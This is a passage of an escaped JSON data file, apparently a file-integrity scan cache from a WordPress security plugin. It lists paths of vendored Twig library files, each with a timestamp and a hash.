f34746e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Node\\/LeaveProfileNode.php\":{\"d\":1567917024,\"h\":\"d20e5cf6e162cf8020432893f4c829e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Dumper\\/BlackfireDumper.php\":{\"d\":1567917024,\"h\":\"c6c8b27f9d27d140cf4f4816706c1feb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Dumper\\/HtmlDumper.php\":{\"d\":1567917024,\"h\":\"177c1f2c16b7d1d5ac0c53d44c7dd585\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Dumper\\/BaseDumper.php\":{\"d\":1567917024,\"h\":\"d18c8fd29ce71af7649896d1cea671d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Dumper\\/TextDumper.php\":{\"d\":1567917024,\"h\":\"ef6338c77dc17ffb369daa4969134f07\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Profiler\\/Profile.php\":{\"d\":1567917024,\"h\":\"7dfdd7aab606108526740ed2410cb7d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/RuntimeExtensionInterface.php\":{\"d\":1567917024,\"h\":\"d8c82a29001d5e0577086c048f382b57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/OptimizerExtension.php\":{\"d\":1567917024,\"h\":\"f821f3d4e2916c16233a63110ed184fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/SandboxExtension.php\":{\"d\":1567917024,\"h\":\"8203e3ef64a61d9c9e52a961c0c417b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/StringLoaderExtension.php\":{\"d\":1567917024,\"h\":\"f5199b0b4e8e73d1760c8e228c72fb6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/EscaperExtension.php\":{\"d\":1567917024,\"h\":\"b840d14ab6afb9c191b9369b5e8d9980\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/CoreExtension.php\":{\"d\":1567917024,\"h\":\"3c3c15a6f03576f5aea12d083c8536f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/DebugExtension.php\":{\"d\":1567917024,\"h\":\"0d3f0dea4f9f1f39923d739b050ec96b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/GlobalsInterface.php\":{\"d\":1567917024,\"h\":\"0f0ff64e333784e74159f7482c0ac060\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/AbstractExtension.php\":{\"d\":1567917024,\"h\":\"e65a39567db9f0f0fe57ad6c14382907\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/StagingExtension.php\":{\"d\":1567917024,\"h\":\"75df53505422debc4765a060db6cec20\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/InitRuntimeInterface.php\":{\"d\":1567917024,\"h\":\"a1554d9ac096cd64648e2c66ebd8fdb6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/ProfilerExtension.php\":{\"d\":1567917024,\"h\":\"ea7d8f41bc59894bfec77fe998910dec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Extension\\/ExtensionInterface.php\":{\"d\":1567917024,\"h\":\"8f82cf100a66579fc3b488a975b6812b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Error\\/SyntaxError.php\":{\"d\":1567917024,\"h\":\"7e3cab0242418ec374266731c66200bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Error\\/Error.php\":{\"d\":1567917024,\"h\":\"9c0cb07c081e8d406fc4498b6c74c042\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Error\\/LoaderError.php\":{\"d\":1567917024,\"h\":\"88ecd8f4caaea426867302cc79e5d664\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Error\\/RuntimeError.php\":{\"d\":1567917024,\"h\":\"d4ea3fc112e7ac1f0271c140b0414c9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeVisitor\\/EscaperNodeVisitor.php\":{\"d\":1567917024,\"h\":\"bebc4917738e86fd34a61f44b7be9046\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeVisitor\\/AbstractNodeVisitor.php\":{\"d\":1567917024,\"h\":\"f91c18954f4d77e8fba611ddb7de3916\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeVisitor\\/SafeAnalysisNodeVisitor.php\":{\"d\":1567917024,\"h\":\"0067b09ef187578b7ff95b9b7c9ac4c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeVisitor\\/NodeVisitorInterface.php\":{\"d\":1567917024,\"h\":\"8dc65f4298409383e4242ac7fc513170\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeVisitor\\/SandboxNodeVisitor.php\":{\"d\":1567917024,\"h\":\"38bbc40b3e159c6184ee927b8d97c095\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeVisitor\\/OptimizerNodeVisitor.php\":{\"d\":1567917024,\"h\":\"2ccbe2293d291022063a686f8c114c4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Loader\\/FilesystemLoader.php\":{\"d\":1567917024,\"h\":\"a290d218d1731e8ac8d6ec531259f87e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Loader\\/ExistsLoaderInterface.php\":{\"d\":1567917024,\"h\":\"345293588ecb537893db1514d6cb54ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Loader\\/LoaderInterface.php\":{\"d\":1567917024,\"h\":\"d525c4c99898b8a5e7a15939bde66438\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Loader\\/SourceContextLoaderInterface.php\":{\"d\":1567917024,\"h\":\"b19786586c3608754da4ab4c63a59052\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Loader\\/ChainLoader.php\":{\"d\":1567917024,\"h\":\"964557a5539e078c6051614d04edb11e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Loader\\/ArrayLoader.php\":{\"d\":1567917024,\"h\":\"9019742f167205606a9c6e3bb85e3513\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/MacroTokenParser.php\":{\"d\":1567917024,\"h\":\"69cbb64bd6796067cab0a39c0a379aac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/UseTokenParser.php\":{\"d\":1567917024,\"h\":\"a7a3c1765db0005a73dac9d98600a57c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/AutoEscapeTokenParser.php\":{\"d\":1567917024,\"h\":\"c518eb0e45b10bda2c562a885cd62885\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/SandboxTokenParser.php\":{\"d\":1567917024,\"h\":\"b4e82d6e3edbf7425288ba1625afb4c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/ImportTokenParser.php\":{\"d\":1567917024,\"h\":\"62928b38ade9553b3ce69bae576c8d78\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/ForTokenParser.php\":{\"d\":1567917024,\"h\":\"c901ddef0fbb4e9cddc15cf1782fbd85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/ApplyTokenParser.php\":{\"d\":1567917024,\"h\":\"4a6c468b2a13cc6483dc69fe7d1429da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/SpacelessTokenParser.php\":{\"d\":1567917024,\"h\":\"df73a30dd1a1222b0fc2ff37f4d7b6ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/IfTokenParser.php\":{\"d\":1567917024,\"h\":\"c5c6c61c73f7ca660d425e2e7a8a6e5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/WithTokenParser.php\":{\"d\":1567917024,\"h\":\"76f39d9c2f2976765afb16f025b6712f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/FilterTokenParser.php\":{\"d\":1567917024,\"h\":\"4ae926ceddfbcce96afd676b0773185d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/FromTokenParser.php\":{\"d\":1567917024,\"h\":\"4fcc064fd242a4d0342c05407bdf6b03\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/AbstractTokenParser.php\":{\"d\":1567917024,\"h\":\"414442707567ab1608c3c9d161518fb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/EmbedTokenParser.php\":{\"d\":1567917024,\"h\":\"697fc69a0a4eb5d06be1a3675d76632f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/SetTokenParser.php\":{\"d\":1567917024,\"h\":\"7cf31479a55d08d3159bf38671d8d60f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/ExtendsTokenParser.php\":{\"d\":1567917024,\"h\":\"a2e806185585f54c123c74313d1039e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/DeprecatedTokenParser.php\":{\"d\":1567917024,\"h\":\"f71fc041fd314dbbf3b241f220974213\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/IncludeTokenParser.php\":{\"d\":1567917024,\"h\":\"8442f2750f7f59942924ab91baad9836\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/FlushTokenParser.php\":{\"d\":1567917024,\"h\":\"e17300c14c09668b656791dc892bc592\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/BlockTokenParser.php\":{\"d\":1567917024,\"h\":\"e0c6fd95e6126d471a93c9d2be39f17c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/TokenParserInterface.php\":{\"d\":1567917024,\"h\":\"5bdbcae78c9d4c19c3399e1927daeecb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenParser\\/DoTokenParser.php\":{\"d\":1567917024,\"h\":\"9735a11437b31bacd805b6484fe97f62\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/RuntimeLoader\\/RuntimeLoaderInterface.php\":{\"d\":1567917024,\"h\":\"85f35aebed11d999cc49d7e33c939e69\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/RuntimeLoader\\/FactoryRuntimeLoader.php\":{\"d\":1567917024,\"h\":\"5168f15aa362004eb85ad5343ed9b5f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/RuntimeLoader\\/ContainerRuntimeLoader.php\":{\"d\":1567917024,\"h\":\"fd1ea8a2d1362d9d08bc286f69a946b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Unary\\/NotUnary.php\":{\"d\":1567917024,\"h\":\"391b6f417e545857e3c0c7ea9d0c892b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Unary\\/PosUnary.php\":{\"d\":1567917024,\"h\":\"f2a2bc5865635ad93866a8b331bce43c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Unary\\/AbstractUnary.php\":{\"d\":1567917024,\"h\":\"f3ed92173c568dd729c41594187d5343\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Unary\\/NegUnary.php\":{\"d\":1567917024,\"h\":\"8f2084984e11516f80a87cb55ef0f1b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Filter\\/DefaultFilter.php\":{\"d\":1567917024,\"h\":\"ff8f80d3a8f2a277d3f2f2ac0347d580\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/LessEqualBinary.php\":{\"d\":1567917024,\"h\":\"9350f1cb951cdd2ecde8a3030cfa1d04\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/InBinary.php\":{\"d\":1567917024,\"h\":\"bcda121bdc19e23408b93449c23b807a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/RangeBinary.php\":{\"d\":1567917024,\"h\":\"43cf2ff8a101776586aa901b6c82ec3b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/BitwiseAndBinary.php\":{\"d\":1567917024,\"h\":\"201272eafbdb16269449ce5f20d766a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/BitwiseXorBinary.php\":{\"d\":1567917024,\"h\":\"45ff83d84433dc9e2fdfd7683723ed94\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/AddBinary.php\":{\"d\":1567917024,\"h\":\"471adb6892da3d726d4e86e2452e241a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/NotEqualBinary.php\":{\"d\":1567917024,\"h\":\"ff86e9a1e5a7e327e6f63217036fcf39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/PowerBinary.php\":{\"d\":1567917024,\"h\":\"8f5daf8a347d13de49e2b090a990a791\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/GreaterBinary.php\":{\"d\":1567917024,\"h\":\"ca99250bde07c3ed8b263a64d3b7f5c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/ModBinary.php\":{\"d\":1567917024,\"h\":\"dfe1f12b2a2293b70f71989904a97a34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/SubBinary.php\":{\"d\":1567917024,\"h\":\"3300438124f9bd44b7a5d335f5fc8cd1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/LessBinary.php\":{\"d\":1567917024,\"h\":\"eb498d0aba006adae71a654219697f65\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/FloorDivBinary.php\":{\"d\":1567917024,\"h\":\"30c1793c5131ecdbefff42891eb3dda2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/BitwiseOrBinary.php\":{\"d\":1567917024,\"h\":\"3fed54bc7ff2d7230a9591948c1d0d5a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/NotInBinary.php\":{\"d\":1567917024,\"h\":\"fa9f33a3009118c94c907d4dbff507e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/OrBinary.php\":{\"d\":1567917024,\"h\":\"837e3f0772594775c8a141bd7b9a6363\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/EndsWithBinary.php\":{\"d\":1567917024,\"h\":\"1168e30d8ec8572eac8c5986e4896406\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/StartsWithBinary.php\":{\"d\":1567917024,\"h\":\"e39894ac7340226215da856ac0261f8d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/MatchesBinary.php\":{\"d\":1567917024,\"h\":\"835b52f3e10c37e90fb736c9758c5992\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/DivBinary.php\":{\"d\":1567917024,\"h\":\"6be789a33f824dbb29787784f35df04f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/ConcatBinary.php\":{\"d\":1567917024,\"h\":\"84a2b4c4d6c13a0176bdaf00e5c372bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/AndBinary.php\":{\"d\":1567917024,\"h\":\"a4c7fff788b02718101f6d0da4aef648\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/AbstractBinary.php\":{\"d\":1567917024,\"h\":\"5b39ad25381fdb440cba49aafc5eb0b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/GreaterEqualBinary.php\":{\"d\":1567917024,\"h\":\"3281cc8e2362eea41e92d472ddd56444\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/EqualBinary.php\":{\"d\":1567917024,\"h\":\"cc2fb53232128df6bf1bee24a40d0722\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Binary\\/MulBinary.php\":{\"d\":1567917024,\"h\":\"699818dae2a4000ad41e6baf7200ca21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/OddTest.php\":{\"d\":1567917024,\"h\":\"d29bc1a216c4cc2f003b817e9775bf2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/SameasTest.php\":{\"d\":1567917024,\"h\":\"351447f267ce109847737db1c7cf79f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/DefinedTest.php\":{\"d\":1567917024,\"h\":\"218894e6a1b1e013874782c6325d23bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/EvenTest.php\":{\"d\":1567917024,\"h\":\"b636929a69395d39ba5b4f522abb3bb9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/NullTest.php\":{\"d\":1567917024,\"h\":\"942b74b8233afa6e6bb4c4eea456c4ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/ConstantTest.php\":{\"d\":1567917024,\"h\":\"fee0676b41473cbc1ac31a8a635af236\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/Test\\/DivisiblebyTest.php\":{\"d\":1567917024,\"h\":\"18f18498f678e2086ef18a155faca801\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/GetAttrExpression.php\":{\"d\":1567917024,\"h\":\"d1cdd426b423b0d08570573e4880c938\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/CallExpression.php\":{\"d\":1567917024,\"h\":\"ca58040390a601d2130b00db5a0b2a99\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/NullCoalesceExpression.php\":{\"d\":1567917024,\"h\":\"8b75382cd259302d511206a9d3def4c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/NameExpression.php\":{\"d\":1567917024,\"h\":\"f12992526fa684784300d8ceacbda3bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/BlockReferenceExpression.php\":{\"d\":1567917024,\"h\":\"f2217e1fa522a3e39edaa47770319cf0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/AbstractExpression.php\":{\"d\":1567917024,\"h\":\"d5ca7d7caa49f283cd01cdab662c39a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\